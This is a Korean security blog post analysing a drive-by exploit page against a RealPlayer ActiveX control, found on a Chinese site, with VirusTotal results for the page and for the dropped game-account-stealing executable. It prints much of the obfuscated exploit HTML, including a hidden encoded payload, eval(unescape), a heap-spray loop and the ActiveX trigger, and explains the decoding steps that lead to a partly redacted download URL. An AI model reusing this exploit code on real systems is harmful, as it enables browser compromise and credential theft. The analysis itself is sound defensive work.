* 먼저 이글에서 도움을 주신 네오님 감사합니다~
이글은 비 전문가인 제가 아는데 까지만 서술 한것을 알려드립니다. 수정 할 점이 있으면 댓글 주세요.
Exploit.RealPlayerRmoc3260.b 로 불리는 것을 오늘 오전에 중국사이트 내에서 보았다. 코드를 보았을 때는 막막하였다.. 하지만 도움을 받아 하나 둘씩 풀어 나가다 보니.. 최종파일 까지 보게 되었다.
r1.htm에서 바로 최종을 드롭하는것이 아니라 . ga.js로 넘어가서 마지막 파일까지 드롭하는 방식을 사용한것으로 보인다~
하지만 ga.js로 넘어가서도 리플레이스를 한번 더 해줘야만 최종 파일까지 근접할수가 있다. 리플레이스 방식에서 대해서는 r1.htm을 해석 한다면 쉽게 알수 있다.....
r1.htm의 형식은 다음과 같다
html>
<head>
<div id=ahahah style='display:none'>%72%72%72%3D%72%72%72%2E%72%65%70%6C%61%63%65%28%2F%3D%2F%67%2C%22%30%22%29(중략)30%29%20%62%6C%6F%3D%20%62%6F%63%6B%20%2B%20%62%6C%6F%63%6B%20%6C%6C%62%6C%6F%63%6B%3B</div>
<script src="ga.js" language="JavaScript"></script>
<script language="JavaScript">
var rrrriii=document.getElementById("\x61"+"\x68\x61"+"\x68\x61\x68").innerHTML;
eval(unescape(rrrriii));
try {
new window["Act"+"iveXObject"]("AnHey.Wm");
}
catch (e) {
var tgTSov1 = 400;
var DXVpMkf1 = new window["\x41"+"\x72\x72"+"\x61\x79"]();
for (i = 0; i < tgTSov1; i++){ DXVpMkf1[i] = block + ahririri }
var aoSU$1 = 32;
var u$kSs1 = '';
while (u$kSs1["\x6c"+"중략"+"\x68"] < aoSU$1) u$kSs1 = u$kSs1 + window["\x75\x6e"+"\x65"+"\x73"+"중략"+"\x65"]("\x25"+중략+"\x43");
}
function ahso()
var _NNieb1 = '';
_NNieb1 = aheygg["\x43"+"\x6f\x6e\x73"+"\x6f"+""중략""];
aheygg["\x43"+""중략""+"\x73\x6f\x6c"+"\x65"] = u$kSs1;
aheygg["\x43"+"\x6f"+""중략""+""중략""] = _NNieb1;
_NNieb1 = aheygg["\x43"+""중략""+"\x6c\x65"];
aheygg["\x43"+"\x6f\x6e\x73"+""중략""] = u$kSs1;
aheygg["\x43"+"중략"+"\x65"] = _NNieb1;
}
</script>
</head>
<body onload="JavaScript: return ahso();">
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="aheygg"></object>
</body>
</html>
clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93 이것을 통해서 검색을 해보니 취약점이 나오게 되었다 해당 취약점은 2007년에 이미 패치가 된것으로 알려지고 있다.
clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93 자세한 사항 : http://kr.ahnlab.com/info/securityinfo/secuinfo/newSecuScrap.ahn?seq=12281
뭐 아무튼 리플레이스도 봤으면 다시 ga.js 로 넘어간다 .
var rrr = "tt9=9=tt9=9=tt9=9=tte1d9tt34d9tt5824tt5858 (중략) tt440ftt4459tt2121 이런식으로 되어있다.
리플레이스 방법은 tt = "%u" , = 를 "0" 으로 대체해준다면
마지막 최종 파일 http://www.jx(중략)twg.com/dnf/01.exe 에 접근할수 있다.
최종파일은 온라인 계정 해킹으로 보인다 .
[바이러스 토탈]
r1.htm
| Antivirus | Version | Last update | Result |
|---|---|---|---|
| AhnLab-V3 | 2010.09.10.00 | 2010.09.10 | - |
| AntiVir | 8.2.4.50 | 2010.09.09 | HTML/Rce.Gen |
| Antiy-AVL | 2.0.3.7 | 2010.09.10 | - |
| Authentium | 5.2.0.5 | 2010.09.09 | - |
| Avast | 4.8.1351.0 | 2010.09.09 | - |
| Avast5 | 5.0.594.0 | 2010.09.09 | - |
| AVG | 9.0.0.851 | 2010.09.09 | - |
| BitDefender | 7.2 | 2010.09.10 | - |
| CAT-QuickHeal | 11.00 | 2010.09.09 | - |
| ClamAV | 0.96.2.0-git | 2010.09.10 | - |
| Comodo | 6029 | 2010.09.10 | - |
| DrWeb | 5.0.2.03300 | 2010.09.10 | - |
| Emsisoft | 5.0.0.37 | 2010.09.10 | - |
| eSafe | 7.0.17.0 | 2010.09.07 | - |
| eTrust-Vet | 36.1.7845 | 2010.09.09 | - |
| F-Prot | 4.6.1.107 | 2010.09.01 | - |
| F-Secure | 9.0.15370.0 | 2010.09.10 | - |
| Fortinet | 4.1.143.0 | 2010.09.09 | - |
| GData | 21 | 2010.09.10 | - |
| Ikarus | T3.1.1.88.0 | 2010.09.10 | - |
| Jiangmin | 13.0.900 | 2010.09.09 | - |
| K7AntiVirus | 9.63.2483 | 2010.09.09 | - |
| Kaspersky | 7.0.0.125 | 2010.09.10 | - |
| McAfee | 5.400.0.1158 | 2010.09.10 | - |
| McAfee-GW-Edition | 2010.1B | 2010.09.09 | - |
| Microsoft | 1.6103 | 2010.09.10 | - |
| NOD32 | 5438 | 2010.09.09 | - |
| Norman | 6.06.06 | 2010.09.09 | - |
| nProtect | 2010-09-09.03 | 2010.09.09 | - |
| Panda | 10.0.2.7 | 2010.09.09 | - |
| PCTools | 7.0.3.5 | 2010.09.10 | - |
| Prevx | 3.0 | 2010.09.10 | - |
| Rising | 22.64.03.01 | 2010.09.09 | - |
| Sophos | 4.57.0 | 2010.09.10 | - |
| Sunbelt | 6853 | 2010.09.09 | - |
| SUPERAntiSpyware | 4.40.0.1006 | 2010.09.10 | - |
| Symantec | 20101.1.1.7 | 2010.09.10 | - |
| TheHacker | 6.7.0.0.012 | 2010.09.09 | - |
| TrendMicro | 9.120.0.1004 | 2010.09.10 | - |
| TrendMicro-HouseCall | 9.120.0.1004 | 2010.09.10 | - |
| VBA32 | 3.12.14.0 | 2010.09.08 | Exploit.JS.Agent.acp |
| ViRobot | 2010.9.8.4031 | 2010.09.09 | - |
| VirusBuster | 12.64.26.0 | 2010.09.09 | - |
| MD5: 6c73a4171a5c6a540e841634028936cd |
| SHA1: 4c8ac028611a7427526c870a7b2b50e8e4a26c92 |
| SHA256: f96ba1653c502d8474591cb7f504e9a6a067c7dbc9e0efc2b0372efcd2d7a5bd |
| File size: 2760 bytes |
| Scan date: 2010-09-10 01:49:06 (UTC) |
01.exe
| Antivirus | Version | Last update | Result |
|---|---|---|---|
| AhnLab-V3 | 2010.09.10.00 | 2010.09.10 | Dropper/Win32.OnlineGameHack |
| AntiVir | 8.2.4.50 | 2010.09.09 | TR/Spy.Gen |
| Antiy-AVL | 2.0.3.7 | 2010.09.10 | Trojan/Win32.OnLineGames.gen |
| Authentium | 5.2.0.5 | 2010.09.09 | W32/OnlineGames.A.gen!GSA |
| Avast | 4.8.1351.0 | 2010.09.09 | Win32:Lolyda-B |
| Avast5 | 5.0.594.0 | 2010.09.09 | Win32:Lolyda-B |
| AVG | 9.0.0.851 | 2010.09.09 | PSW.OnlineGames3.ATGB |
| BitDefender | 7.2 | 2010.09.10 | Gen:Trojan.Heur.RP.bmHfaqpOWMj |
| CAT-QuickHeal | 11.00 | 2010.09.10 | - |
| ClamAV | 0.96.2.0-git | 2010.09.10 | Trojan.Spy-73885 |
| Comodo | 6029 | 2010.09.10 | TrojWare.Win32.PSW.OnLineGames.~Bnkk |
| DrWeb | 5.0.2.03300 | 2010.09.10 | Trojan.PWS.Siggen.7648 |
| Emsisoft | 5.0.0.37 | 2010.09.10 | Trojan-GameThief.Win32.WOW!IK |
| eSafe | 7.0.17.0 | 2010.09.07 | - |
| eTrust-Vet | 36.1.7845 | 2010.09.09 | Win32/Gamepass!generic |
| F-Prot | 4.6.1.107 | 2010.09.01 | W32/OnlineGames.A.gen!GSA |
| F-Secure | 9.0.15370.0 | 2010.09.10 | Gen:Trojan.Heur.RP.bmHfaqpOWMj |
| Fortinet | 4.1.143.0 | 2010.09.09 | - |
| GData | 21 | 2010.09.10 | Gen:Trojan.Heur.RP.bmHfaqpOWMj |
| Ikarus | T3.1.1.88.0 | 2010.09.10 | Trojan-GameThief.Win32.WOW |
| Jiangmin | 13.0.900 | 2010.09.09 | Trojan/PSW.OnLineGames.budt |
| K7AntiVirus | 9.63.2483 | 2010.09.09 | Riskware |
| Kaspersky | 7.0.0.125 | 2010.09.10 | Trojan-GameThief.Win32.OnLineGames.bnkk |
| McAfee | 5.400.0.1158 | 2010.09.10 | Suspect-D!DAC41243EBD5 |
| McAfee-GW-Edition | 2010.1B | 2010.09.10 | PWS-Gamania.dll |
| Microsoft | 1.6103 | 2010.09.10 | PWS:Win32/Dozmot.A |
| NOD32 | 5438 | 2010.09.09 | Win32/TrojanDropper.Agent.ORH |
| Norman | 6.06.06 | 2010.09.09 | W32/Magania.GZ |
| nProtect | 2010-09-09.03 | 2010.09.09 | - |
| Panda | 10.0.2.7 | 2010.09.09 | Suspicious file |
| PCTools | 7.0.3.5 | 2010.09.10 | Trojan-PSW.Gampass |
| Prevx | 3.0 | 2010.09.10 | - |
| Rising | 22.64.03.01 | 2010.09.09 | Trojan.PSW.Win32.GameOL.urk |
| Sophos | 4.57.0 | 2010.09.10 | Mal/PWS-CF |
| Sunbelt | 6853 | 2010.09.09 | BehavesLike.Win32.Malware.dah (mx-v) |
| SUPERAntiSpyware | 4.40.0.1006 | 2010.09.10 | Trojan.Agent/Gen-OnlineGames |
| Symantec | 20101.1.1.7 | 2010.09.10 | Infostealer.Gampass |
| TheHacker | 6.7.0.0.012 | 2010.09.09 | Trojan/OnLineGames.bnkk |
| TrendMicro | 9.120.0.1004 | 2010.09.10 | TSPY_DOZMOT.SMC |
| TrendMicro-HouseCall | 9.120.0.1004 | 2010.09.10 | TSPY_DOZMOT.SMC |
| VBA32 | 3.12.14.0 | 2010.09.08 | TrojanDropper.Agent.cxks |
| ViRobot | 2010.9.8.4031 | 2010.09.10 | - |
| VirusBuster | 12.64.26.0 | 2010.09.09 | - |
| MD5: dac41243ebd58ae95904a0fa28fdf3a1 |
| SHA1: 915f9213e6bb2d883f04cfcec12968f5009c2175 |
| SHA256: fe18635af5c45e9436c145a4eb001f3a2ab92e701cc72e4a9effb364c44139e5 |
| File size: 21032 bytes |
| Scan date: 2010-09-10 03:30:04 (UTC) |
파일 신고 : 이스트 소프트 , 안철수연구소 , 네이버 !!
'security > 악성코드 유포' 카테고리의 다른 글
| yahoo.js 의 유포날짜 2차 정리 !! (0) | 2010.09.26 |
|---|---|
| 아스키 코드로 이루어진 악성 아이프레임 !! (0) | 2010.09.19 |
| yahoo.js 의 유포날짜 정리 ?? (0) | 2010.09.07 |
| 지난주 악성코드 유포지 6곳 !! (0) | 2010.09.07 |
| 지난주 악성코드 유포지 3곳 !! (0) | 2010.08.31 |